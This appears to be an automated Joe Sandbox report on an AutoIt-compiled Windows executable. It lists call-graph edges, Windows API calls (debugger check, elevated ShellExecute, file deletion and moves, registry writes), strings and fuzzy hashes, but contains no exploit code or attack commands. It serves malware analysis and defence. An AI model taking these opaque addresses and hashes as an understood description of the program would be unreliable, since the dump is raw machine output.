95452 3566c1 95450->95452 95451->95453 95453->95338 95457 31acd8 95456->95457 95458 360566 95456->95458 
95457->95458 95461 31ace2 95457->95461 95459 33016b 8 API calls 95458->95459 95460 360577 95459->95460 95463 33019b 8 API calls 95460->95463 95462 33019b 8 API calls 95461->95462 95464 31aced __fread_nolock 95461->95464 95462->95464 95463->95464 95464->95348 95482 3522f0 __wsopen_s 95481->95482 95483 37e790 GetShortPathNameW 95482->95483 95484 3184b7 8 API calls 95483->95484 95485 37e7b8 95484->95485 95485->94848 95485->94852 95487 317a65 95486->95487 95488 317a9e 95486->95488 95490 33016b 8 API calls 95487->95490 95489 31be6d 8 API calls 95488->95489 95491 317a78 95488->95491 95489->95491 95490->95491 95491->94853 95493 33016b 8 API calls 95492->95493 95494 3141b8 95493->95494 95494->94861 95496 35587b 95495->95496 95497 316ac6 95495->95497 95498 35588c 95496->95498 95500 3184b7 8 API calls 95496->95500 95502 33016b 8 API calls 95497->95502 95499 31bceb 8 API calls 95498->95499 95501 355896 95499->95501 95500->95498 95501->95501 95503 316ad9 95502->95503 95504 316ae2 95503->95504 95505 316af4 95503->95505 95506 31b25f 8 API calls 95504->95506 95507 31bf07 8 API calls 95505->95507 95508 316aea 95506->95508 95507->95508 95508->94872 95512 33d6be 95509->95512 95513 33d6d5 95512->95513 95514 33d89f 95512->95514 95513->95514 95518 33d740 95513->95518 95540 33f669 20 API calls _free 95514->95540 95516 33d8af 95541 342b7c 26 API calls _strftime 95516->95541 95519 33d764 95518->95519 95526 33d78b 95518->95526 95535 345153 26 API calls 2 library calls 95518->95535 95534 33f669 20 API calls _free 95519->95534 95521 33d868 95521->95519 95524 33d774 95521->95524 95527 33d87b 95521->95527 95522 33d820 95522->95519 95525 33d841 95522->95525 95537 345153 26 API calls 2 library calls 95522->95537 95524->94888 95525->95519 95525->95524 95530 33d857 95525->95530 95526->95519 95533 33d7fd 95526->95533 95536 345153 26 API calls 2 library calls 95526->95536 95539 345153 26 API calls 2 library calls 95527->95539 95538 345153 26 API calls 2 library calls 95530->95538 95533->95521 
95533->95522 95534->95524 95535->95526 95536->95533 95537->95525 95538->95524 95539->95524 95540->95516 95541->95524 95543 355985 95542->95543 95544 316e69 CreateFileW 95542->95544 95545 316e88 95543->95545 95546 35598b CreateFileW 95543->95546 95544->95545 95545->94936 95545->94937 95546->95545 95547 3559b3 95546->95547 95606 316bfa 95547->95606 95550 316b27 95549->95550 95563 316b24 messages 95549->95563 95551 316bfa 3 API calls 95550->95551 95550->95563 95552 316b44 95551->95552 95553 316b51 95552->95553 95554 35589b 95552->95554 95556 33019b 8 API calls 95553->95556 95555 32fdc9 3 API calls 95554->95555 95555->95563 95557 316b5d 95556->95557 95558 3141a6 8 API calls 95557->95558 95559 316b67 95558->95559 95612 31b050 95559->95612 95563->94946 95565 316bfa 3 API calls 95564->95565 95567 32fde7 95565->95567 95566 316bfa 3 API calls 95568 32fe08 95566->95568 95567->95566 95568->94926 95570 33019b 8 API calls 95569->95570 95571 317a39 95570->95571 95572 33016b 8 API calls 95571->95572 95573 317a47 95572->95573 95574 32bfbc 95573->95574 95575 32c003 95574->95575 95576 32bfc7 95574->95576 95577 31bceb 8 API calls 95575->95577 95576->95575 95578 32bfd6 95576->95578 95587 37d2ab 95577->95587 95579 32bfeb 95578->95579 95581 32bff8 95578->95581 95619 32c009 95579->95619 95626 37d3b2 12 API calls 95581->95626 95584 37d2da 95584->94940 95585 32bff4 95585->94940 95586 31acc0 8 API calls 95586->95587 95587->95584 95587->95586 95627 37d249 95587->95627 95588->94955 95590 37d4ce 95589->95590 95591 37d4d9 WriteFile 95589->95591 95668 37d3f7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95590->95668 95591->94954 95593->94909 95595 31b050 2 API calls 95594->95595 95596 3141da 95595->95596 95596->94939 95598 381764 95597->95598 95599 33016b 8 API calls 95598->95599 95600 38176b 95599->95600 95601 381798 95600->95601 95602 381777 95600->95602 95604 33019b 8 API calls 95601->95604 95603 33019b 8 API calls 95602->95603 95605 381780 ___scrt_fastfail 95603->95605 95604->95605 
95605->94947 95611 316c11 95606->95611 95607 3558ec SetFilePointerEx 95608 316c98 SetFilePointerEx SetFilePointerEx 95610 316c64 95608->95610 95609 3558db 95609->95607 95610->95545 95611->95607 95611->95608 95611->95609 95611->95610 95613 31b0cb 95612->95613 95617 31b05e 95612->95617 95618 32f13c SetFilePointerEx 95613->95618 95615 316b73 95616 31b09c ReadFile 95616->95615 95616->95617 95617->95615 95617->95616 95618->95617 95620 32c1f1 8 API calls 95619->95620 95621 32c021 95620->95621 95634 31adc1 95621->95634 95625 32c03c 95625->95585 95626->95585 95628 37d253 95627->95628 95629 37d26a 95627->95629 95628->95629 95630 37d259 95628->95630 95631 31b050 2 API calls 95629->95631 95632 31b050 2 API calls 95630->95632 95633 37d263 95631->95633 95632->95633 95633->95587 95648 32feaa 95634->95648 95636 31b050 2 API calls 95639 31add2 95636->95639 95637 31ae07 95637->95625 95640 318774 MultiByteToWideChar 95637->95640 95639->95636 95639->95637 95655 31b0e3 8 API calls __fread_nolock 95639->95655 95641 3187a0 95640->95641 95642 3187e7 95640->95642 95643 33019b 8 API calls 95641->95643 95644 31bceb 8 API calls 95642->95644 95645 3187b5 MultiByteToWideChar 95643->95645 95647 3187db 95644->95647 95656 3187f0 95645->95656 95647->95625 95649 36fe13 95648->95649 95650 32febb 95648->95650 95651 33016b 8 API calls 95649->95651 95650->95639 95652 36fe1d 95651->95652 95653 33019b 8 API calls 95652->95653 95654 36fe32 95653->95654 95655->95639 95657 318803 95656->95657 95658 318884 95656->95658 95657->95658 95668->95591 95670 38a25f 95669->95670 95671 38a345 95669->95671 95672 33016b 8 API calls 95670->95672 95740 38a607 39 API calls 95671->95740 95674 38a266 95672->95674 95675 33019b 8 API calls 95674->95675 95676 38a277 95675->95676 95679 317953 FindCloseChangeNotification 95676->95679 95677 38a2ff 95678 38a422 95677->95678 95682 38a327 95677->95682 95685 38a390 95677->95685 95741 38276a 10 API calls 95678->95741 95681 38a282 95679->95681 95684 31bf07 8 API calls 95681->95684 
95682->94959 95683 38a429 95689 37d4bf 4 API calls 95683->95689 95686 38a28a 95684->95686 95687 318e70 56 API calls 95685->95687 95688 317953 FindCloseChangeNotification 95686->95688 95698 38a397 95687->95698 95690 38a291 95688->95690 95714 38a405 95689->95714 95692 318e70 56 API calls 95690->95692 95691 38a418 95720 37d517 95691->95720 95693 38a29d 95692->95693 95696 317953 FindCloseChangeNotification 95693->95696 95694 38a3cb 95697 317a14 8 API calls 95694->95697 95699 38a2a7 95696->95699 95700 38a3db 95697->95700 95698->95691 95698->95694 95702 316e52 5 API calls 95699->95702 95703 38a3eb 95700->95703 95706 31be6d 8 API calls 95700->95706 95701 317953 FindCloseChangeNotification 95704 38a47b 95701->95704 95705 38a2b6 95702->95705 95707 3165a4 8 API calls 95703->95707 95708 317923 FindCloseChangeNotification 95704->95708 95709 38a2ba 95705->95709 95710 38a31f 95705->95710 95706->95703 95711 38a3f9 95707->95711 95708->95682 95715 316b12 13 API calls 95709->95715 95712 317923 FindCloseChangeNotification 95710->95712 95713 37d517 16 API calls 95711->95713 95712->95682 95713->95714 95714->95682 95714->95701 95716 38a2c8 95715->95716 95739 316afb SetFilePointerEx SetFilePointerEx SetFilePointerEx 95716->95739 95718 38a2cf 95718->95677 95719 37d4bf 4 API calls 95718->95719 95719->95677 95721 37d58e 95720->95721 95722 37d52a 95720->95722 95723 37d4bf 4 API calls 95721->95723 95722->95721 95724 37d52f 95722->95724 95738 37d576 95723->95738 95725 37d582 95724->95725 95726 37d539 95724->95726 95749 37d5ac 12 API calls messages 95725->95749 95728 37d558 95726->95728 95730 37d543 95726->95730 95747 32c170 8 API calls 95728->95747 95745 32c170 8 API calls 95730->95745 95731 37d560 95748 37d44d 10 API calls 95731->95748 95733 37d54b 95746 32f9e2 10 API calls 95733->95746 95736 37d556 95742 37d4fb 95736->95742 95738->95714 95739->95718 95740->95677 95741->95683 95743 37d4bf 4 API calls 95742->95743 95744 37d50d 95743->95744 95744->95738 95745->95733 95746->95736 95747->95731 

                                                    Control-flow Graph

                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 00315DA7
                                                      • Part of subcall function 003184B7: _wcslen.LIBCMT ref: 003184CA
                                                    • GetCurrentProcess.KERNEL32(?,003ADC2C,00000000,?,?), ref: 00315ED3
                                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 00315EDA
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00315F05
                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00315F17
                                                    • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00315F25
                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 00315F2C
                                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 00315F51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                    • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                    • API String ID: 3290436268-3101561225
                                                    • Opcode ID: fa4ae45d1178278b2f4929dede771f13841d190a96eb3393496c47882afc0dad
                                                    • Instruction ID: 5527b4c7c96e1b3a4b67e2ba08df771f99dadd7574245b8efd8f536e48669f1c
                                                    • Opcode Fuzzy Hash: fa4ae45d1178278b2f4929dede771f13841d190a96eb3393496c47882afc0dad
                                                    • Instruction Fuzzy Hash: 9CA1833990A6C0CFC73BC768BCC15DA7F5C6B6A301F055A99E4859B2E1C6784988CF31
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,003132EF,?), ref: 00313342
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,003132EF,?), ref: 00313355
                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,003E2418,003E2400,?,?,?,?,?,?,003132EF,?), ref: 003133C1
                                                      • Part of subcall function 003184B7: _wcslen.LIBCMT ref: 003184CA
                                                      • Part of subcall function 003141E6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,003133E9,003E2418,?,?,?,?,?,?,?,003132EF,?), ref: 00314227
                                                    • SetCurrentDirectoryW.KERNEL32(?,00000001,003E2418,?,?,?,?,?,?,?,003132EF,?), ref: 00313442
                                                    • MessageBoxA.USER32 ref: 00353C8A
                                                    • SetCurrentDirectoryW.KERNEL32(?,003E2418,?,?,?,?,?,?,?,003132EF,?), ref: 00353CCB
                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003D31F4,003E2418,?,?,?,?,?,?,?,003132EF), ref: 00353D54
                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00353D5B
                                                      • Part of subcall function 0031345A: GetSysColorBrush.USER32(0000000F), ref: 00313465
                                                      • Part of subcall function 0031345A: LoadCursorW.USER32(00000000,00007F00), ref: 00313474
                                                      • Part of subcall function 0031345A: LoadIconW.USER32(00000063), ref: 0031348A
                                                      • Part of subcall function 0031345A: LoadIconW.USER32(000000A4), ref: 0031349C
                                                      • Part of subcall function 0031345A: LoadIconW.USER32(000000A2), ref: 003134AE
                                                      • Part of subcall function 0031345A: LoadImageW.USER32 ref: 003134C6
                                                      • Part of subcall function 0031345A: RegisterClassExW.USER32 ref: 00313517
                                                      • Part of subcall function 0031353A: CreateWindowExW.USER32 ref: 00313568
                                                      • Part of subcall function 0031353A: CreateWindowExW.USER32 ref: 00313589
                                                      • Part of subcall function 0031353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,003132EF,?), ref: 0031359D
                                                      • Part of subcall function 0031353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,003132EF,?), ref: 003135A6
                                                      • Part of subcall function 003138F2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003139C3
                                                    Strings
                                                    • runas, xrefs: 00353D4F
                                                    • 0$>, xrefs: 0031341C
                                                    • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00353C84
                                                    • AutoIt, xrefs: 00353C7F
                                                    Similarity
                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                    • String ID: 0$>$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                    • API String ID: 683915450-1561685704
                                                    • Opcode ID: 49c0105af6170062accdeebd135aa3687d8f4c3aa16f7ea1a629cfb8a34b9a7f
                                                    • Instruction ID: 60c8674ac3706a49e4f9d9c937fe86778a5a2f88fc5a9b9916c1177ed4af17bd
                                                    • Opcode Fuzzy Hash: 49c0105af6170062accdeebd135aa3687d8f4c3aa16f7ea1a629cfb8a34b9a7f
                                                    • Instruction Fuzzy Hash: CC51F735108385AAC71BEF62DC56DEF7BAD9F89740F400529F4915A1E2CF608A89CB23
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 0031557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00315558,?,?,00354B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0031559E
                                                      • Part of subcall function 0037E9C5: GetFileAttributesW.KERNELBASE(?,0037D755), ref: 0037E9C6
                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 0037D8E2
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0037D99D
                                                    • MoveFileW.KERNEL32(?,?), ref: 0037D9B0
                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 0037D9CD
                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0037D9F7
                                                      • Part of subcall function 0037DA5C: CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,0037D9DC,?,?), ref: 0037DA72
                                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 0037DA13
                                                    • FindClose.KERNEL32(00000000), ref: 0037DA24
                                                    Strings
                                                    Similarity
                                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                    • String ID: \*.*
                                                    • API String ID: 1946585618-1173974218
                                                    • Opcode ID: f889174851e02c67ae1dafe6e69d5df8dd6e9dfae6dde2c3ed6c972d211c437e
                                                    • Instruction ID: 4a2e9bd584f25fb2a68446cef5da35ccfc72899769b826ccd52aea0f69d84757
                                                    • Opcode Fuzzy Hash: f889174851e02c67ae1dafe6e69d5df8dd6e9dfae6dde2c3ed6c972d211c437e
                                                    • Instruction Fuzzy Hash: 9161603180114DABCF1BEFE0D9429EDB7B9AF19300F2480A5E446BB191EB355F49CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • lstrlenW.KERNEL32(?,00354686), ref: 0037E397
                                                    • GetFileAttributesW.KERNELBASE(?), ref: 0037E3A6
                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 0037E3B7
                                                    • FindClose.KERNEL32(00000000), ref: 0037E3C3
                                                    Similarity
                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                    • String ID:
                                                    • API String ID: 2695905019-0
                                                    • Opcode ID: 911173ed7232c1267a49749d289dd6a05964a2948fd8653d2f5ae20cd7bcb6e0
                                                    • Instruction ID: 1ff36260d504352d4c74028067fd3c7037e1a251b0675251058f8b813f35965c
                                                    • Opcode Fuzzy Hash: 911173ed7232c1267a49749d289dd6a05964a2948fd8653d2f5ae20cd7bcb6e0
                                                    • Instruction Fuzzy Hash: EEF0E53041192057D223677CAC0D8AA77AC9E46335F108B51F83BC34F0D7B4DDA58695
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?,0033504E,?,003D98D8,0000000C,003351A5,?,00000002,00000000), ref: 00335099
                                                    • TerminateProcess.KERNEL32(00000000,?,0033504E,?,003D98D8,0000000C,003351A5,?,00000002,00000000), ref: 003350A0
                                                    • ExitProcess.KERNEL32 ref: 003350B2
                                                    Similarity
                                                    • API ID: Process$CurrentExitTerminate
                                                    • String ID:
                                                    • API String ID: 1703294689-0
                                                    • Opcode ID: ecde8d9173665cc14e7f93426cea3bf27c4490d55efb17a77e513ba47bf52d7c
                                                    • Instruction ID: c48b26cf9b925039f8484f86b836796323bb910273c027a6b491bc62ef8bfedb
                                                    • Opcode Fuzzy Hash: ecde8d9173665cc14e7f93426cea3bf27c4490d55efb17a77e513ba47bf52d7c
                                                    • Instruction Fuzzy Hash: 3FE0B631400548AFCF276F54DD49E593B6DEF41381F014014F8168B562DB36ED42CBD0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_00020D71,0033077E), ref: 00330D6A
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 6c6035ba19b2386b266c701fd56dac657e8ea1f5dc79391ac0a94ba9256145a0
                                                    • Instruction ID: baa4192ff09386f845b5b5a6da992b58c52faf3c489eded5aa0a674f62061be3
                                                    • Opcode Fuzzy Hash: 6c6035ba19b2386b266c701fd56dac657e8ea1f5dc79391ac0a94ba9256145a0
                                                    • Instruction Fuzzy Hash:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0039CE1C
                                                    • RegCreateKeyExW.KERNELBASE(?,?,00000000,003ADCD0,00000000,?,00000000,?,?), ref: 0039CEA3
                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0039CF03
                                                    • _wcslen.LIBCMT ref: 0039CF53
                                                    • _wcslen.LIBCMT ref: 0039CFCE
                                                    • RegSetValueExW.KERNELBASE(00000001,?,00000000,00000001,?,?), ref: 0039D011
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0039D120
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0039D1AC
                                                    • RegCloseKey.KERNELBASE(?), ref: 0039D1E0
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0039D1ED
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0039D2BF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                    • API String ID: 9721498-966354055
                                                    • Opcode ID: 2f37baab0b21dd406b93de82524845ff69c7f61a640801864a5c813cb696e31d
                                                    • Instruction ID: f0b59681534127f0278eaceeb45ff93cf56e3c772b0a6fcf1af80afc903d3c35
                                                    • Opcode Fuzzy Hash: 2f37baab0b21dd406b93de82524845ff69c7f61a640801864a5c813cb696e31d
                                                    • Instruction Fuzzy Hash: 4C1259356042019FDB1ADF14C881A6ABBE5FF88754F05849CF89A9F3A2CB31ED41CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                    • API String ID: 0-1645009161
                                                    • Opcode ID: 041ad76c326981c2fc27566b561a89dffe0990cb0f476e2c8da8153eb157d390
                                                    • Instruction ID: 33747efd2297e53f252478950df2f7c12ef40c3a9343d8e860dc54da74641c7b
                                                    • Opcode Fuzzy Hash: 041ad76c326981c2fc27566b561a89dffe0990cb0f476e2c8da8153eb157d390
                                                    • Instruction Fuzzy Hash: 8A81D571A44206BBDB1BAF64DC42FEF7B68AF09700F044015FD06AE196EB70DA85C7A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00330456
                                                      • Part of subcall function 0033047D: InitializeCriticalSectionAndSpinCount.KERNEL32(003E170C,00000FA0,8377C484,?,?,?,?,00352753,000000FF), ref: 003304AC
                                                      • Part of subcall function 0033047D: GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00352753,000000FF), ref: 003304B7
                                                      • Part of subcall function 0033047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00352753,000000FF), ref: 003304C8
                                                      • Part of subcall function 0033047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 003304DE
                                                      • Part of subcall function 0033047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 003304EC
                                                      • Part of subcall function 0033047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 003304FA
                                                      • Part of subcall function 0033047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00330525
                                                      • Part of subcall function 0033047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00330530
                                                    • ___scrt_fastfail.LIBCMT ref: 00330477
                                                      • Part of subcall function 00330433: __onexit.LIBCMT ref: 00330439
                                                    Strings
                                                    • SleepConditionVariableCS, xrefs: 003304E4
                                                    • kernel32.dll, xrefs: 003304C3
                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 003304B2
                                                    • InitializeConditionVariable, xrefs: 003304D8
                                                    • WakeAllConditionVariable, xrefs: 003304F2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                    • API String ID: 66158676-1714406822
                                                    • Opcode ID: 63b5ed457679a638b6aed9e515ad6f60ed43a42108e6384efc9ee1f0b9a27c5a
                                                    • Instruction ID: 9b6b15c4d2f48cf8ef23cd414f0051b7f347e284e8b2d548cdfdcac13c6a31db
                                                    • Opcode Fuzzy Hash: 63b5ed457679a638b6aed9e515ad6f60ed43a42108e6384efc9ee1f0b9a27c5a
                                                    • Instruction Fuzzy Hash: 2C21DB32A447506FE72B6BB5AC95BAE77ECDB46F65F010129F902DBAD0DB709C008A50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                    • String ID:
                                                    • API String ID: 2189390790-0
                                                    • Opcode ID: 1ce1720a305b19ba4003ad6c1683820e64235fd773ad5dfd65e0bba25a928c46
                                                    • Instruction ID: e9446830c7f758a5de46791934d01392fb79659660aa74ab3071043bb14bce0f
                                                    • Opcode Fuzzy Hash: 1ce1720a305b19ba4003ad6c1683820e64235fd773ad5dfd65e0bba25a928c46
                                                    • Instruction Fuzzy Hash: 6A32E574604341EFD72BCF24C884BAAB7E9BF4A304F158A2DF4558B291D771E984CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00313690,?,?), ref: 003136FE
                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,00313690,?,?), ref: 0031372A
                                                    • SetTimer.USER32 ref: 0031374D
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00313690,?,?), ref: 00313758
                                                    • CreatePopupMenu.USER32(?,?,?,?,?,00313690,?,?), ref: 0031376C
                                                    • PostQuitMessage.USER32(00000000), ref: 0031378D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                    • String ID: 0$>$0$>$TaskbarCreated
                                                    • API String ID: 129472671-2151881006
                                                    • Opcode ID: 5ce969851600c65670d9a031cbdcaef6add6f735f3d56b55e38c4331b4260311
                                                    • Instruction ID: 368bfc18e29dc98fda2c9777db3db68c60f33efc1e9a8f99b161436260cb67d8
                                                    • Opcode Fuzzy Hash: 5ce969851600c65670d9a031cbdcaef6add6f735f3d56b55e38c4331b4260311
                                                    • Instruction Fuzzy Hash: 6941F5B5104184BBDB2F5B78DC8ABFA366DE70D350F001225F9468E6E1CBA59FC48652
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 003135DE
                                                    • RegisterClassExW.USER32 ref: 00313608
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00313619
                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00313636
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00313646
                                                    • LoadIconW.USER32(000000A9), ref: 0031365C
